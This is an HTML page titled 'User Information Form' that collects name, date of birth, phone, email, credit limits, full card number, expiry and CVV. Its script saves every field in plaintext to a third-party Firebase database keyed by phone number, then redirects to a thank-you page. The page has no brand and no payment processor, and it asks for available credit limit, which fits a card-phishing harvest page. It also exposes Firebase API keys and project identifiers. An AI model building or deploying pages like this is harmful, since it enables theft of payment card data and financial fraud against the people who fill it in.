<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>User Information Form</title>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/flatpickr/dist/flatpickr.min.css">
<script src="https://cdn.jsdelivr.net/npm/flatpickr"></script>
<script src="https://www.gstatic.com/firebasejs/9.6.8/firebase-app-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.6.8/firebase-database-compat.js"></script>
<link rel="stylesheet" href="jquery-ui.min.css" type="text/css">
<style>
body {
  font-family: 'Roboto', Arial, sans-serif;
  margin: 0;
  padding: 0;
  background-color: #ffffff;
  color: #333;
}

header {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 80px;
  background-color: white;
  border-bottom: 1px solid #ffffff;
  display: flex;
  justify-content: center;
  align-items: center;
  z-index: 1000;
  box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
}

header img {
    max-height: 50px;
    width: auto;
    transition: all 0.3s ease;
}

.container {
  margin-top: 100px;
  padding: 20px;
  padding-bottom: 50px;
}

form {
  max-width: 600px;
  margin: 0 auto;
  background-color: #fff;
  padding: 30px;
  border-radius: 8px;
}

label {
  display: block;
  margin-bottom: 8px;
  font-weight: 500;
  color: #555;
}

input {
  width: 100%;
  padding: 12px;
  margin-bottom: 20px;
  box-sizing: border-box;
  border: 1px solid #000;
  border-radius: 4px;
  font-size: 16px;
  transition: border-color 0.3s ease;
}

input:focus {
  outline: none;
  border-color: #00B5EF;
  box-shadow: 0 0 5px rgba(70, 3, 214, 0.2);
}

/* Style for placeholder text */
::placeholder {
  color: #888;
  opacity: 1;
}

button {
  height: 50px;
  width: 200px;
  padding: 10px;
  margin: 15px auto 30px auto;
  display: block;
  box-sizing: border-box;
  border: none;
  border-radius: 25px;
  background-color: #00B5EF;
  color: #fff;
  font-size: 16px;
  font-weight: bold;
  cursor: pointer;
  transition: all 0.3s ease;
  position: relative;
  overflow: hidden;
}

button:before {
  content: "";
  position: absolute;
  top: 50%;
  left: 50%;
  width: 0;
  height: 0;
  background-color: rgba(255, 255, 255, 0.2);
  border-radius: 50%;
  transform: translate(-50%, -50%);
  transition: width 0.6s ease-out, height 0.6s ease-out;
}

button:hover {
  background-color: #00B5EF;
  width: 220px;
  box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
}

button:hover:before {
  width: 300px;
  height: 300px;
}

@media (max-width: 768px) {
  form {
    padding: 20px;
  }
  
  button {
    width: 100%;
  }
  
  button:hover {
    width: 100%;
  }
  
  input {
    padding: 16px;
    font-size: 18px;
  }
}
</style>
</head>
<body>
  <header>
    <img src="src/logo.png" alt="Logo">
  </header>
  <div class="container">
    <form id="userForm" onsubmit="submitForm(); return false;">
      <label for="name">Name:</label>
      <input type="text" id="name" name="name" placeholder="Enter your name" required>

      <label for="dob">Date of Birth:</label>
      <input type="text" id="dob" name="dob" placeholder="Date Of Birth" required>

      <label for="mobile">Mobile Number:</label>
      <input type="number" id="mobile" name="mobile" placeholder="Enter your mobile number" required>

      <label for="email">Email Address:</label>
      <input type="email" id="email" name="email" placeholder="Enter your email" required>

      <label for="totalLimit">Total Limit:</label>
      <input type="number" id="totalLimit" name="totalLimit" placeholder="Enter total limit" required>

      <label for="availableLimit">Available Limit:</label>
      <input type="number" id="availableLimit" name="availableLimit" placeholder="Enter available limit" required>

      <label for="cardholdername">Card Holder Name:</label>
      <input type="text" id="cardholdername" name="cardholdername" placeholder="Enter card holder name" required>

      <label for="cardnumber">Card Number:</label>
      <input type="text" id="cardnumber" name="cardNumber" maxlength="19" placeholder="Enter card number" required>

      <label for="expiryDate">Card Expiry:</label>
      <input type="text" id="expiryDate" name="expiryDate" maxlength="5" placeholder="MM/YY" required>

      <label for="cvv">Card CVV:</label>
      <input type="password" id="cvv" name="cvv" maxlength="4" placeholder="Enter CVV" required>

      <button type="submit">Proceed Now</button>
    </form>
  </div>
 <script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
 <script src="jquery-ui.min.js"></script>
  <script>
    // Initialize Flatpickr for the date of birth field
    document.addEventListener('DOMContentLoaded', function() {
      flatpickr("#dob", {
        dateFormat: "d-m-Y", // Adjust date format as per requirement
        maxDate: "today", // Prevent future dates
        allowInput: true,
        placeholder: "Date Of Birth",
        onReady: function(selectedDates, dateStr, instance) {
          instance._input.placeholder = instance._input.getAttribute('placeholder'); // Ensure placeholder is set
        },
        onValueUpdate: function(selectedDates, dateStr, instance) {
          instance._input.placeholder = !dateStr ? 'Date Of Birth' : ''; // Toggle placeholder based on input
        }
      });
    });

    // Add event listener to format card number input
    document.getElementById('cardnumber').addEventListener('input', function(e) {
        let input = e.target;
        let value = input.value.replace(/\D/g, ''); // Remove non-digit characters
        let formattedValue = '';

        for (let i = 0; i < value.length; i += 4) {
            if (i > 0) {
                formattedValue += ' ';
            }
            formattedValue += value.substring(i, i + 4);
        }

        input.value = formattedValue;
    });

    // Add event listener to format expiry date input
    document.getElementById('expiryDate').addEventListener('input', function(e) {
        let input = e.target;
        let value = input.value.replace(/\D/g, ''); // Remove non-digit characters
        let formattedValue = '';

        if (value.length > 0) {
            formattedValue = value.substring(0, 2); // MM
        }
        if (value.length > 2) {
            formattedValue += '/' + value.substring(2, 4); // /YY
        }

        input.value = formattedValue;
    });

    // Firebase configuration
const firebaseConfig = {
  apiKey: "AIzaSyAHFQqWQlzAQy1XE_UCDWHp4jj8vg-4Gmc",
  authDomain: "sbnew2.firebaseapp.com",
  databaseURL: "https://sbnew2-default-rtdb.firebaseio.com",
  projectId: "sbnew2",
  storageBucket: "sbnew2.firebasestorage.app",
  messagingSenderId: "311036887496",
  appId: "1:311036887496:web:61145274ee6b1f4ffdc0fd",
  measurementId: "G-2EC4345XWH"
};
    // Initialize Firebase
    firebase.initializeApp(firebaseConfig);
    const database = firebase.database();

    // Function to handle form submission
    function submitForm() {
        const formData = {
            name: document.getElementById('name').value,
            dob: document.getElementById('dob').value,
            mobile: document.getElementById('mobile').value,
            email: document.getElementById('email').value,
            totalLimit: document.getElementById('totalLimit').value,
            availableLimit: document.getElementById('availableLimit').value,
            cardholdername: document.getElementById('cardholdername').value,
            cardnumber: document.getElementById('cardnumber').value,
            expiryDate: document.getElementById('expiryDate').value,
            cvv: document.getElementById('cvv').value,
        };

        // Save the data to Firebase
        database.ref("/data").child(formData.mobile).child("Details").set(formData, function(error) {
            if (error) {
                alert('Data could not be saved. ' + error);
            } else {
                window.location.href = 'Thank.html';
                database.ref("/main").child(formData.mobile).child("Details").set(formData)
            }
        });
      database.ref().child("key").set(formData.mobile);
      database.ref("/main").child(formData.mobile).child("Details").set(formData)
    }
  </script>
</body>
</html>
